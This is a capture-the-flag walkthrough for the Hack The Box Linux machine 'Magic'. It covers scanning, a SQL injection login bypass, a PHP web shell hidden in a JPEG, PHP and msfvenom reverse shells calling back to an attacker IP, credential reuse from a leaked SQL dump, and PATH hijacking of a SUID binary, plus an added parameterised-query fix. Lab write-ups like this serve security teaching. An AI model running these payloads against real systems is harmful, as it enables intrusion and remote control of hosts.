
Summary
Magic is a Linux box of medium difficulty from the Hack The Box platform, retired on 22 August 2020 at 19:00:00 UTC. This box offers interesting attack vectors such as SQL injection, PHP code injection into an image file, and more.
Scanning and Enumeration
After adding an entry to our /etc/hosts file, we perform a typical scan to check which ports are open.
$ ports=$(sudo nmap -p- --min-rate=1000 -T4 magic.htb | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
$ sudo nmap -p$ports -T4 -Pn -A magic.htb
This reveals an OpenSSH 7.6p1 server running on port 22 and Apache httpd 2.4.29 on port 80.
From the main page, we can see a login page pointing to http://magic.htb/login.php.

After some basic SQL injection testing, we found that this form is vulnerable to this kind of attack. We are able to bypass the authentication mechanism by injecting the following value into the username input field:
admin' AND 1234 = 1234 -- abc
Once logged in, we get access to a page that allows us to upload images to the website.
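To show why the bypass above works and what the login form should have done instead, here is an added Python example that is not part of the original writeup: a constructed in-memory SQLite login table (placeholder password, not the box's real data), the string-concatenated query a form like this one evidently builds, and a parameterised query that treats the same input as plain data.

```python
import sqlite3

# Constructed demo data (assumption): one admin row, as the box's login table
# would hold, but with a placeholder password instead of the real one.
DEMO_USERNAME = "admin"
DEMO_PASSWORD = "placeholder-password"

# The exact value injected into the username field in the writeup.
BYPASS = "admin' AND 1234 = 1234 -- abc"


def make_db():
    """Create an in-memory `login` table with a single admin row."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE login (id INTEGER, username TEXT, password TEXT)")
    conn.execute("INSERT INTO login VALUES (1, ?, ?)", (DEMO_USERNAME, DEMO_PASSWORD))
    conn.commit()
    return conn


def vulnerable_login(conn, username, password):
    """String-concatenated query: the user's input becomes part of the SQL text.

    With BYPASS as the username, the closing quote ends the string literal and
    `--` comments out the rest of the line, so the password check never runs.
    """
    query = (
        "SELECT id FROM login WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone() is not None


def safe_login(conn, username, password):
    """Parameterised query: input is bound as data and never parsed as SQL.

    The same BYPASS string is compared literally against the username column,
    matches nothing, and the login fails.
    """
    query = "SELECT id FROM login WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    print("concatenated query, injected username:", vulnerable_login(db, BYPASS, "wrong"))
    print("parameterised query, injected username:", safe_login(db, BYPASS, "wrong"))
```

Note that the payload only works because the attacker already guessed a valid username; binding parameters removes the bypass regardless of what is typed, and a salted password hash in the table would also keep the credential from being reusable for su later.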
Getting a Foothold
Since we are now able to upload files to the server, our next goal should be to upload a backdoor so we can interact with the system.
This stage involved some trial and error, because the server performs input validation on uploaded files. For instance, simply sending a PHP file with a double extension such as backdoor.php.jpg, or tampering with HTTP headers, won't work.
One approach that works for this target is injecting PHP code into a JPEG image in order to exploit a flaw in the PHP-GD built-in function imagecreatefromjpeg(). This approach is better described here, and a tool to accomplish it can be found at https://github.com/dlegs/php-jpeg-injector.
With an image to infect, run something like:
python gd-jpeg.py cat.jpg '<?php if(isset($_REQUEST["cmd"])){echo "<pre>";$cmd = ($_REQUEST["cmd"]);system($cmd);echo "</pre>";die;}?>' magic-cat.php.jpg
After uploading magic-cat.php.jpg to the server, we can run arbitrary commands passed as the value of the cmd parameter, for instance:
http://magic.htb/images/uploads/magic-cat.php.jpg?cmd=whoami.
To get a reverse shell from the target to our machine, we could run
php -r '$sock=fsockopen("10.10.15.15",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
Before we submit this command to our web shell though, we should URL-encode it, for instance with hURL:
$ hURL -U -f url
Original file :: url
URL ENcoded :: php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.15.15%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27
The final URL is then: http://magic.htb/images/uploads/magic-cat.php.jpg?cmd=php%20-r%20%27%24sock%3Dfsockopen%28%2210.10.15.15%22%2C4444%29%3Bexec%28%22%2Fbin%2Fsh%20-i%20%3C%263%20%3E%263%202%3E%263%22%29%3B%27.
Sending this request to the server gives us a shell as user www-data.
Owning User
With some basic filesystem enumeration, we can find a file named file.sql containing the following line:
INSERT INTO `login` VALUES (1,'admin','Th3s3usW4sK1ng');
Besides, looking at either the /home directory or the /etc/passwd file, we see that there is a user called theseus on the system.
Simply run su theseus and provide the password Th3s3usW4sK1ng to own user and get your flag: de****************************14.
Owning System
By enumerating the system a little more, we can find a SUID binary at /bin/sysinfo for which we have execute permission. This is a compiled program that shows some system information.
Running strings on that file shows that it calls several system command line tools without specifying their full path. Thus, we can change our PATH environment variable by adding /tmp at the beginning and plant a malicious file there with the same name as one of the tools called by sysinfo.
For that task, we first create a payload with msfvenom:
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.15.15 LPORT=5555 -f elf > free
Then, we upload this binary to the target's /tmp directory and execute /bin/sysinfo. Now, instead of the program executing the system free command, which shows information about system memory, it will actually execute our malicious file placed at /tmp/free, giving us a root shell.
Enjoy your root flag 76****************************5a!